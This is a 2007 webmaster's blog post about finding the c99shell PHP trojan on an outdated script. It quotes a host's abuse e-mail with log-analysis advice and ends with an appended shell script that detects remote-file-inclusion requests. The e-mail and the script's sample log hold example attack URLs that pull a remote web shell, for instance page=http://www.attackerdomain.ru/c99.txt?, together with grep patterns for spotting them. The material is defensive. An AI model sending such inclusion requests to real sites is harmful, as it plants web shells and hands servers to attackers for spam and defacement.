By mondala
Published: August 12, 2007

MAKE BACKUPS - KEEP YOUR SCRIPTS UP TO DATE!

Recently I had a problem with general server performance issues.

To my surprise I found the c99shell php trojan on one of my sites.

http://www.sophos.com/security/analyses/phpc99shella.html

Basically I had an old image hosting script on a domain within my server, which of course was vulnerable and resulted in access to writable folders and, in the end, my server being abused.

The good thing was that I have a VPS that I am mostly responsible for myself, so I had time to explore and locate the issue.

However, a vulnerable site is always a time-pressing issue: your data could be compromised, your IPs could be banned for mass mailing (spam), or your sites could even be defaced or deleted.

If you are on a shared hosting plan you will probably get a warning from your host, as they monitor for and locate malicious behaviour from your account, and you will need to fix the issue before they lock your account. Once that happens you can typically restore things, but you might have to prove to them that your webspace is clean and ready to abide by their TOS.

I'll leave you with this email (below) which is from a host provider to a customer regarding malicious activity from an account.

Remember to audit all of your scripts and webspace code regularly for security problems. Always run the latest version of any given script and keep close to the support forums for those scripts so you are aware of what is happening. It is also a good idea to delete any old script installs. Password-protect any test/development installations, and be sure not to rename config files such as config.php to config.old or config.txt when they contain passwords: the web server then serves them as plain text instead of executing them, and Google Code or other indexes might pick them up and display them to everyone.

========================================

Dear Customer,

Unfortunately we received a large number of complaints concerning Spam-Mails sent through your Webspace.

We have to bring to your attention that this kind of mass mailing is illegal and can be prosecuted.

To help you get a general idea of the situation we divided this E-Mail into two thematic sections.

In case you personally send large amounts of E-Mails, especially newsletters, please continue reading on section one.

If you suspect that your Webspace has been compromised, especially through a script, by a third party and abused to send Spam-Mails, please continue reading on section two.

*******************************************************************************

1. E-Mail/Newsletter sent by yourself?

*******************************************************************************

If you arrange the sending of the concerning mails by yourself, please note that you have to use a so-called "confirmed opt-in" system for your newsletter subscriptions to ensure that E-Mails are only sent out to recipients who explicitly agreed to receive them.

When using confirmed opt-in the subscription process looks something like this:

* Somebody asks for an address to be added to the list of recipients
* The system sends an E-Mail to that address with a verification link or code
* Only when that (unique) link is clicked or the code mailed back is the address allowed to be added into the database

You can find further information for example at:

http://en.wikipedia.org/wiki/Opt_in_e-mail

In case of complaints you can prove, by the verification you received, that the recipient explicitly agreed to be on your list.

*******************************************************************************

2. Webspace compromised by a third party?

*******************************************************************************

Quite often the Webspace gets compromised via insecure PHP-Scripts. Insecure PHP Scripts with security holes like Cross-site-scripting (http://en.wikipedia.org/wiki/Cross_site_scripting) make it possible to include for example Mass-Mailing-Scripts and execute them on your Webspace.

It is very helpful to analyze the Apache log files to detect such attacks. The attacks mostly look like the following *example*:

http://www.mydomain.com/index.php?page=http://www.attackerdomain.ru/c99.txt?

Searching the log files with the pattern "=http" would be the first step:

'grep "=http" access.log | less' for the actual log file

and

'zgrep "=http" access.log.* | less' for the older log files

If you detect such entries, we would recommend that you analyze and modify the concerning script to prevent further abuse.

In case of a third party script (for example mambo) check the relevant homepage for security updates and patches.

Furthermore we recommend that you check all your third party scripts for security patches or updates.

In addition a complete search of your Webspace for unknown foreign scripts makes sense.

If you need more information in this case you can request a sample SPAM E-mail, which was sent via your Webspace, from us.

If the SPAM problem persists we recommend a complete deletion of all your files on your space and a recovery of your data with a clean backup.

We hereby ask you to take the corresponding steps required to secure your Webspace and to prevent the delivery of unwanted, unsolicited bulk e-mail.

Should further complaints reach us, we'll feel impelled to take corresponding steps according to our T&C, which results in a temporary lock.

Thank you for your understanding.

If you have further questions, feel free to contact us.

Kind Regards.

========================================
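The log search the host's e-mail describes, as an added example that is not code from the article or from the hosting provider: a POSIX shell script that runs the same check over constructed sample Apache log lines and widens the bare "=http" pattern to https, ftp and percent-encoded URLs, then ranks the source IPs and lists the remote URLs that were requested. The log lines, IP addresses and the example.invalid hostname are all constructed.

```shell
#!/bin/sh
# Added example, not code from the article or the hosting provider.
# Scans Apache access logs for requests that hand a URL to a script
# parameter, the remote-file-inclusion pattern the e-mail describes.
# The log lines below are constructed; example.invalid is a placeholder.

LOG=$(mktemp)
trap 'rm -f "$LOG"' EXIT
cat > "$LOG" <<'EOF'
203.0.113.5 - - [12/Aug/2007:10:01:02 +0000] "GET /index.php?page=about HTTP/1.1" 200 1024 "-" "Mozilla/5.0"
203.0.113.9 - - [12/Aug/2007:10:02:15 +0000] "GET /index.php?page=http://example.invalid/c99.txt? HTTP/1.1" 200 5120 "-" "libwww-perl/5.8"
203.0.113.9 - - [12/Aug/2007:10:02:40 +0000] "GET /gallery/show.php?img=https://example.invalid/x.txt HTTP/1.1" 200 5120 "-" "libwww-perl/5.8"
198.51.100.7 - - [12/Aug/2007:10:03:00 +0000] "GET /redirect.php?url=http%3A%2F%2Fexample.invalid%2Fshell.txt HTTP/1.1" 302 0 "-" "curl/7.16"
EOF

# rfi_hits LOGFILE: print every request whose query string assigns a
# URL to a parameter. Broader than the e-mail's bare "=http" grep: it
# also matches https/ftp and the percent-encoded "%3A%2F%2F" form.
rfi_hits() {
    grep -iE '=(https?|ftp)(:|%3a)(/|%2f){2}' "$1"
}

# rfi_count LOGFILE: number of such requests.
rfi_count() {
    rfi_hits "$1" | wc -l | tr -d ' '
}

# rfi_remote_urls LOGFILE: the remote URLs the requests tried to pull in,
# one per line, so the defender can see what was fetched and from where.
rfi_remote_urls() {
    grep -ioE '=(https?|ftp)(:|%3a)(/|%2f){2}[^ &"]*' "$1" | sed 's/^=//'
}

# rfi_sources LOGFILE: source IPs ranked by number of hits.
rfi_sources() {
    rfi_hits "$1" | awk '{print $1}' | sort | uniq -c | sort -rn
}

# Stand-alone run: summarize the constructed log. For rotated, gzipped
# logs (access.log.*.gz) write "zcat" output to a temp file first.
echo "suspicious requests: $(rfi_count "$LOG")"
rfi_sources "$LOG"
rfi_remote_urls "$LOG"
```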
